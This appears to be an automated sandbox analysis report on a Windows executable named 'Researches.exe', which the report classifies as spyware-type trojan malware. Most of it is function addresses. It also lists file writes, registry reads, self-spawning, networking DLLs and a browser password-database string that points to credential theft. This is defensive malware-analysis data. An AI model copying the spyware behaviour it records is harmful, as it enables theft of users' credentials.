Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36825420	11_2_36825420
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682D827	11_2_3682D827
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682F02F	11_2_3682F02F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682D838	11_2_3682D838
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682B839	11_2_3682B839
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682F040	11_2_3682F040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36820040	11_2_36820040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682B848	11_2_3682B848
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682A1A1	11_2_3682A1A1
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368241A8	11_2_368241A8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368281AF	11_2_368281AF
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368261C0	11_2_368261C0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36820DC0	11_2_36820DC0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368281C0	11_2_368281C0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368261D0	11_2_368261D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36820DD0	11_2_36820DD0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682C5E8	11_2_3682C5E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682C5F8	11_2_3682C5F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36829D0F	11_2_36829D0F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36827D23	11_2_36827D23
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36829D20	11_2_36829D20
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36825D33	11_2_36825D33
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36827D30	11_2_36827D30
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36821D38	11_2_36821D38
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36825D40	11_2_36825D40
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682E149	11_2_3682E149
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682F950	11_2_3682F950
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682C157	11_2_3682C157
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682E158	11_2_3682E158
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682F960	11_2_3682F960
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3682C168	11_2_3682C168
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36841828	11_2_36841828
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684AC60	11_2_3684AC60
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36840E87	11_2_36840E87
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36842680	11_2_36842680
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36847C81	11_2_36847C81
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684D488	11_2_3684D488
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36847C90	11_2_36847C90
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36840E98	11_2_36840E98
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36846498	11_2_36846498
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368464A8	11_2_368464A8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684DEA8	11_2_3684DEA8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36844CB0	11_2_36844CB0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684A2C6	11_2_3684A2C6
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36844CC0	11_2_36844CC0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684A2D0	11_2_3684A2D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36841CDF	11_2_36841CDF
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368434D8	11_2_368434D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848AD8	11_2_36848AD8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848AE8	11_2_36848AE8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684F2E8	11_2_3684F2E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368404F7	11_2_368404F7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36841CF0	11_2_36841CF0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368472F0	11_2_368472F0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36843000	11_2_36843000
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684D200	11_2_3684D200
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36849E08	11_2_36849E08
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848610	11_2_36848610
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36843010	11_2_36843010
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36840013	11_2_36840013
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36841818	11_2_36841818
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848620	11_2_36848620
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36846E2A	11_2_36846E2A
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36846E38	11_2_36846E38
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36840040	11_2_36840040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845640	11_2_36845640
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684C048	11_2_3684C048
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36843E57	11_2_36843E57
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845650	11_2_36845650
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684AC50	11_2_3684AC50
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684266F	11_2_3684266F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36843E68	11_2_36843E68
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36849468	11_2_36849468
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36849478	11_2_36849478
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845188	11_2_36845188
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684A78A	11_2_3684A78A
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36843991	11_2_36843991
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684A798	11_2_3684A798
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684D999	11_2_3684D999
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368439A0	11_2_368439A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848FA0	11_2_36848FA0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684B3A0	11_2_3684B3A0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368421A9	11_2_368421A9
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848FB0	11_2_36848FB0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368421B8	11_2_368421B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368477B8	11_2_368477B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368409C0	11_2_368409C0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368477C8	11_2_368477C8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845FD4	11_2_36845FD4
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368409D0	11_2_368409D0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368447E7	11_2_368447E7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845FE0	11_2_36845FE0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684C7E0	11_2_3684C7E0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36849DFE	11_2_36849DFE
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368447F8	11_2_368447F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36847300	11_2_36847300
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36840508	11_2_36840508
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845B09	11_2_36845B09
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684D710	11_2_3684D710
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845B18	11_2_36845B18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684B118	11_2_3684B118
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36844320	11_2_36844320
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36844330	11_2_36844330
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36849930	11_2_36849930
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684E130	11_2_3684E130
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36842B38	11_2_36842B38
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684BB3A	11_2_3684BB3A
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848147	11_2_36848147
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36849940	11_2_36849940
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36842B48	11_2_36842B48
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36841350	11_2_36841350
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684695F	11_2_3684695F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36848158	11_2_36848158
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684C558	11_2_3684C558
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36841360	11_2_36841360
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36846970	11_2_36846970
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36845178	11_2_36845178
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3684CF78	11_2_3684CF78
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368588B8	11_2_368588B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36858BD8	11_2_36858BD8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368511F8	11_2_368511F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853A87	11_2_36853A87
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856C88	11_2_36856C88
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36859E88	11_2_36859E88
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853A98	11_2_36853A98
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856C98	11_2_36856C98
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36859E98	11_2_36859E98
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685D098	11_2_3685D098
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368524A7	11_2_368524A7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685ECA9	11_2_3685ECA9
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368556A8	11_2_368556A8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685BAA8	11_2_3685BAA8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368588AB	11_2_368588AB
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368524B8	11_2_368524B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368556B8	11_2_368556B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685BAB8	11_2_3685BAB8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685ECB8	11_2_3685ECB8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368540C7	11_2_368540C7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685A4C7	11_2_3685A4C7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368540D8	11_2_368540D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368572D8	11_2_368572D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685A4D8	11_2_3685A4D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685D6D8	11_2_3685D6D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36855CE7	11_2_36855CE7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36852AE7	11_2_36852AE7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685F2E7	11_2_3685F2E7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685C0E8	11_2_3685C0E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685F2F8	11_2_3685F2F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36852AF8	11_2_36852AF8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36855CF8	11_2_36855CF8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36858EF8	11_2_36858EF8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685C0F8	11_2_3685C0F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36852E07	11_2_36852E07
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685920F	11_2_3685920F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856009	11_2_36856009
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685F608	11_2_3685F608
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685F618	11_2_3685F618
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36852E18	11_2_36852E18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856018	11_2_36856018
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36859218	11_2_36859218
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685C418	11_2_3685C418
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685E027	11_2_3685E027
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36854A29	11_2_36854A29
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36851838	11_2_36851838
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36854A38	11_2_36854A38
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36857C38	11_2_36857C38
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685AE38	11_2_3685AE38
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685E038	11_2_3685E038
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856647	11_2_36856647
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685CA47	11_2_3685CA47
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685FC4F	11_2_3685FC4F
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853448	11_2_36853448
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685984B	11_2_3685984B
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685FC58	11_2_3685FC58
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853458	11_2_36853458
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856658	11_2_36856658
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36859858	11_2_36859858
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685CA58	11_2_3685CA58
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685B467	11_2_3685B467
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36851E68	11_2_36851E68
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36855068	11_2_36855068
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36858268	11_2_36858268
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36851E78	11_2_36851E78
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36855078	11_2_36855078
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36858278	11_2_36858278
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685B478	11_2_3685B478
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685E678	11_2_3685E678
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36855387	11_2_36855387
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685B787	11_2_3685B787
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36858588	11_2_36858588
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36852188	11_2_36852188
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36852198	11_2_36852198
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36855398	11_2_36855398
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36858598	11_2_36858598
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685B798	11_2_3685B798
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685E998	11_2_3685E998
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853DA7	11_2_36853DA7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856FA8	11_2_36856FA8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685D3AB	11_2_3685D3AB
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853DB8	11_2_36853DB8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856FB8	11_2_36856FB8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685A1B8	11_2_3685A1B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685D3B8	11_2_3685D3B8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685BDC9	11_2_3685BDC9
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368527C8	11_2_368527C8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368559C8	11_2_368559C8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685EFC8	11_2_3685EFC8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685EFD8	11_2_3685EFD8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368527D8	11_2_368527D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368559D8	11_2_368559D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685BDD8	11_2_3685BDD8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368575E7	11_2_368575E7
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368543E8	11_2_368543E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685D9E8	11_2_3685D9E8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368543F8	11_2_368543F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368575F8	11_2_368575F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685A7F8	11_2_3685A7F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685D9F8	11_2_3685D9F8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36854707	11_2_36854707
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36857907	11_2_36857907
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685DD07	11_2_3685DD07
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36851518	11_2_36851518
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36854718	11_2_36854718
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36857918	11_2_36857918
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685AB18	11_2_3685AB18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685DD18	11_2_3685DD18
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853128	11_2_36853128
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856328	11_2_36856328
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685C728	11_2_3685C728
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685F928	11_2_3685F928
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685F938	11_2_3685F938
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853138	11_2_36853138
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856338	11_2_36856338
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36859538	11_2_36859538
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685C738	11_2_3685C738
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36850540	11_2_36850540
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685E349	11_2_3685E349
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36851B48	11_2_36851B48
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36854D48	11_2_36854D48
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36851B58	11_2_36851B58
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36854D58	11_2_36854D58
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36857F58	11_2_36857F58
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685B158	11_2_3685B158
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685E358	11_2_3685E358
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856967	11_2_36856967
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685CD6D	11_2_3685CD6D
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36853778	11_2_36853778
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36856978	11_2_36856978
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36859B78	11_2_36859B78
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_3685CD78	11_2_3685CD78
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C0360	11_2_368C0360
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C81B0	11_2_368C81B0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C69B0	11_2_368C69B0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C8920	11_2_368C8920
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C1AB0	11_2_368C1AB0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C3910	11_2_368C3910
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C0350	11_2_368C0350
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C40A8	11_2_368C40A8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C0011	11_2_368C0011
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C0040	11_2_368C0040
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C81A4	11_2_368C81A4
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C2EF0	11_2_368C2EF0
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C4D50	11_2_368C4D50
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C4AC8	11_2_368C4AC8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C4840	11_2_368C4840
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_368C8910	11_2_368C8910
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_369A8870	11_2_369A8870
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_369A4794	11_2_369A4794
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_369A75D8	11_2_369A75D8
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_369AE0D0	11_2_369AE0D0

Source: C:\Users\user\Desktop\Researches.exe

Code function: String function: 00402AD0 appears 51 times

Source: Researches.exe

Static PE information: invalid certificate

Source: Researches.exe, 0000000B.00000002.3540699141.0000000033407000.00000004.00000010.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Researches.exe

Source: Researches.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/17@5/5

Source: C:\Users\user\Desktop\Researches.exe

Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040458C

Source: C:\Users\user\Desktop\Researches.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\Researches.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Researches.exe

File created: C:\Users\user\AppData\Local\Temp\nsx66FD.tmp

Jump to behavior

Source: Researches.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Researches.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Researches.exe, 0000000B.00000002.3541070923.00000000338E2000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000338AE000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000338BC000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.000000003389E000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000338D5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Researches.exe	ReversingLabs: Detection: 50%
Source: Researches.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\Researches.exe

File read: C:\Users\user\Desktop\Researches.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"
Source: C:\Users\user\Desktop\Researches.exe	Process created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"
Source: C:\Users\user\Desktop\Researches.exe	Process created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: winhttp.dll	Jump to behavior
